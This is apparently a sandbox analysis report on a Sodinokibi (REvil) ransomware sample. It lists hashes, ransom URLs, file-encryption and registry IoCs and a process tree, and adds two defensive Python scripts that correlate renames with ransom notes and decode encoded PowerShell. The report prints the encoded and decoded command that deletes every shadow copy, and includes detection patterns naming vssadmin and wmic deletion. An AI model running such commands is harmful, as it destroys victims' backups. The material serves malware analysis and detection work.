Analysis
max time kernel: 102s
max time network: 114s
platform: windows7_x64
resource: win7
submitted: 03-08-2020 15:10
Static task: static1
Behavioral task: behavioral1 (Sample: ransomware.exe, Resource: win7)
Behavioral task: behavioral2 (Sample: ransomware.exe, Resource: win10v200722)
General
Target: ransomware.exe
Size: 116KB
MD5: b86ad4241b01376b3924a380f6f4c934
SHA1: 10682d08a18715a79ee23b58fdb6ee44c4e28c61
SHA256: 14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708
SHA512: 54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9
Malware Config
Extracted from: C:\2d177g-readme.txt
Family: sodinokibi
URLs:
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7084D32C9ADE1A6C
http://decryptor.cc/7084D32C9ADE1A6C
Signatures
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
description / ioc / process
File renamed  C:\Users\Admin\Pictures\EditExpand.png => \??\c:\users\admin\pictures\EditExpand.png.2d177g  ransomware.exe
File renamed  C:\Users\Admin\Pictures\InvokeConvert.tiff => \??\c:\users\admin\pictures\InvokeConvert.tiff.2d177g  ransomware.exe
File renamed  C:\Users\Admin\Pictures\ResumeAssert.crw => \??\c:\users\admin\pictures\ResumeAssert.crw.2d177g  ransomware.exe
File renamed  C:\Users\Admin\Pictures\SwitchImport.png => \??\c:\users\admin\pictures\SwitchImport.png.2d177g  ransomware.exe
File opened for modification  \??\c:\users\admin\pictures\InvokeConvert.tiff  ransomware.exe
File renamed  C:\Users\Admin\Pictures\DisableInitialize.crw => \??\c:\users\admin\pictures\DisableInitialize.crw.2d177g  ransomware.exe
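The renames above and the ransom note in Malware Config are two halves of one indicator: every rename appends the same extension (2d177g) and the note dropped alongside it is named 2d177g-readme.txt. The script below is an added example and not part of the sandbox report; it parses the six IoC rows as they are printed on this page (copied inline as constructed sample input), derives the appended extension from each source/destination pair, and checks that a note named <extension>-readme.txt was dropped. The row format it parses and the note-name cross-check are assumptions of the example.

```python
import re
from collections import Counter
from typing import Dict, Optional

# Constructed sample input: the six rows of the "Modifies extensions of user
# files" signature, copied from this report as flat text.
RENAME_IOCS = [
    r"File renamed C:\Users\Admin\Pictures\EditExpand.png => \??\c:\users\admin\pictures\EditExpand.png.2d177g ransomware.exe",
    r"File renamed C:\Users\Admin\Pictures\InvokeConvert.tiff => \??\c:\users\admin\pictures\InvokeConvert.tiff.2d177g ransomware.exe",
    r"File renamed C:\Users\Admin\Pictures\ResumeAssert.crw => \??\c:\users\admin\pictures\ResumeAssert.crw.2d177g ransomware.exe",
    r"File renamed C:\Users\Admin\Pictures\SwitchImport.png => \??\c:\users\admin\pictures\SwitchImport.png.2d177g ransomware.exe",
    r"File opened for modification \??\c:\users\admin\pictures\InvokeConvert.tiff ransomware.exe",
    r"File renamed C:\Users\Admin\Pictures\DisableInitialize.crw => \??\c:\users\admin\pictures\DisableInitialize.crw.2d177g ransomware.exe",
]

# Ransom-note paths taken from Malware Config and the Program Files drops above.
NOTE_PATHS = [
    r"C:\2d177g-readme.txt",
    r"\??\c:\program files (x86)\2d177g-readme.txt",
    r"\??\c:\program files\2d177g-readme.txt",
]

# One IoC row: "File renamed <src> => <dst> <process>". Paths may contain
# spaces; the process name is the final whitespace-free token (assumed format).
_RENAME_ROW = re.compile(r"^File renamed (?P<src>.+?) => (?P<dst>.+?) (?P<proc>\S+)$")


def normalize_nt_path(path: str) -> str:
    """Strip the NT object-manager prefix the sandbox logs (\\??\\) and fold
    case, so a Win32 source path compares equal to its NT-style destination."""
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def appended_extension(src: str, dst: str) -> Optional[str]:
    """Return the extension a rename appended, or None when the rename is not
    a pure 'append one extension' operation (a move or a full rename)."""
    s, d = normalize_nt_path(src), normalize_nt_path(dst)
    if not d.startswith(s + "."):
        return None
    ext = d[len(s) + 1:]
    if not ext or "\\" in ext or "." in ext:
        return None
    return ext


def summarize_renames(rows, note_paths) -> Dict[str, object]:
    """Find the dominant appended extension across the rename rows and check
    that a ransom note named '<extension>-readme.txt' was dropped too."""
    counts: Counter = Counter()
    for row in rows:
        m = _RENAME_ROW.match(row)
        if m is None:
            continue  # other IoC kinds ("File opened for modification") are skipped
        ext = appended_extension(m["src"], m["dst"])
        if ext:
            counts[ext] += 1
    if not counts:
        return {"extension": None, "renames": 0, "note_matches_extension": False}
    ext, n = counts.most_common(1)[0]
    note_names = {normalize_nt_path(p).rsplit("\\", 1)[-1] for p in note_paths}
    return {
        "extension": ext,
        "renames": n,
        "note_matches_extension": f"{ext}-readme.txt" in note_names,
    }


if __name__ == "__main__":
    print(summarize_renames(RENAME_IOCS, NOTE_PATHS))
```

The same pairing is what a file-system detection would key on: many renames appending one previously unseen extension, followed by a text file whose name starts with that extension, is a stronger signal than either event alone.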
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
description / ioc / process
Set value (str)  \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7yvs.bmp"  ransomware.exe
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
description / pid / process
Token: SeDebugPrivilege  1124  ransomware.exe
Token: SeDebugPrivilege  1308  powershell.exe
Token: SeBackupPrivilege  1512  vssvc.exe
Token: SeRestorePrivilege  1512  vssvc.exe
Token: SeAuditPrivilege  1512  vssvc.exe
Token: SeTakeOwnershipPrivilege  1124  ransomware.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid / process
1124  ransomware.exe
1308  powershell.exe
1308  powershell.exe
Modifies service 2 TTPs 5 IoCs
Processes:
description / ioc / process
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}  vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer  vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer  vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer  vssvc.exe
Drops file in Program Files directory 27 IoCs
Processes:
description / ioc / process (all rows: ransomware.exe)
File opened for modification  \??\c:\program files\PushSelect.dxf
File opened for modification  \??\c:\program files\ReceiveUpdate.3gp2
File opened for modification  \??\c:\program files\SelectWrite.gif
File created  \??\c:\program files (x86)\2d177g-readme.txt
File opened for modification  \??\c:\program files\ImportPush.xsl
File opened for modification  \??\c:\program files\OptimizeSplit.rle
File opened for modification  \??\c:\program files\PushComplete.tiff
File opened for modification  \??\c:\program files\NewEnter.xhtml
File opened for modification  \??\c:\program files\ResetUninstall.ogg
File opened for modification  \??\c:\program files\ShowEdit.html
File opened for modification  \??\c:\program files\UninstallResume.mp3
File created  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2d177g-readme.txt
File opened for modification  \??\c:\program files\ApproveSkip.otf
File opened for modification  \??\c:\program files\CopyResize.vsw
File created  \??\c:\program files\microsoft sql server compact edition\2d177g-readme.txt
File opened for modification  \??\c:\program files\EditGroup.mov
File opened for modification  \??\c:\program files\InstallCheckpoint.wmf
File opened for modification  \??\c:\program files\RemoveInstall.vsx
File opened for modification  \??\c:\program files\SyncInvoke.mp2v
File created  \??\c:\program files\microsoft sql server compact edition\v3.5\2d177g-readme.txt
File opened for modification  \??\c:\program files\PingDisable.ppt
File opened for modification  \??\c:\program files\TraceAssert.vstx
File opened for modification  \??\c:\program files\UnpublishPop.mpv2
File created  \??\c:\program files\2d177g-readme.txt
File opened for modification  \??\c:\program files\InstallShow.TTS
File opened for modification  \??\c:\program files\ProtectRedo.wma
File opened for modification  \??\c:\program files\ConvertOptimize.M2T
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
description / pid / process / target process
PID 1124 wrote to memory of 1308  1124  ransomware.exe  powershell.exe  (recorded 4 times)
Enumerates connected drives 3 TTPs
Processes
C:\Users\Admin\AppData\Local\Temp\ransomware.exe  (level 1, PID 1124)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ransomware.exe"
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 2 under PID 1124, PID 1308)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    Decoded (-e takes base64 of UTF-16LE text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\wbem\unsecapp.exe  (level 1, PID 1496)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\vssvc.exe  (level 1, PID 1512)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
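The child powershell.exe in the tree above is launched with -e, which takes base64 of UTF-16LE text, so the raw command line shows nothing until it is decoded; decoded, it enumerates Win32_ShadowCopy over WMI and deletes every instance, which is consistent with the vssvc.exe activity and its SeBackupPrivilege/SeRestorePrivilege tokens recorded above. The script below is an added example and not part of the sandbox report: it decodes an encoded command line as the sandbox printed it (embedded inline as constructed input) and flags shadow-copy deletion idioms. The flag regex, the decoding rules, and the vssadmin/wmic variants (which go beyond what this sample ran) are the example's own assumptions.

```python
import base64
import binascii
import re
from typing import Dict, Optional

# Constructed input: the command line of PID 1308 as recorded in this report.
POWERSHELL_CMDLINE = "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen on command lines (assumed list, not exhaustive).
# The payload is base64 of UTF-16LE text, not UTF-8.
_ENCODED_ARG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)

# Shadow-copy deletion idioms used by ransomware. The WMI form is what this
# sample ran; the vssadmin and wmic forms are added for coverage.
SHADOW_COPY_DELETION = [
    re.compile(r"(?i)win32_shadowcopy\b.*\.delete\s*\("),
    re.compile(r"(?i)\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows"),
    re.compile(r"(?i)\bwmic(?:\.exe)?\b.*\bshadowcopy\s+delete"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a 'powershell -e <base64>' command line, or
    None if there is no encoded argument or it does not decode cleanly."""
    m = _ENCODED_ARG.search(cmdline)
    if m is None:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # PowerShell tolerates missing padding
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None
    if len(raw) % 2:  # odd byte count cannot be UTF-16LE
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_powershell(cmdline: str) -> Dict[str, object]:
    """Decode the command if encoded, then flag shadow-copy deletion in
    whichever text is available (decoded script or the raw command line)."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    hit = any(p.search(script) for p in SHADOW_COPY_DELETION)
    return {"decoded": decoded, "shadow_copy_deletion": hit}


if __name__ == "__main__":
    print(triage_powershell(POWERSHELL_CMDLINE))
```

Decoding before matching is the point: a rule that looks for "Win32_ShadowCopy" or "vssadmin" in raw process command lines never sees this sample's payload, because the only visible tokens are "powershell -e" and a base64 blob.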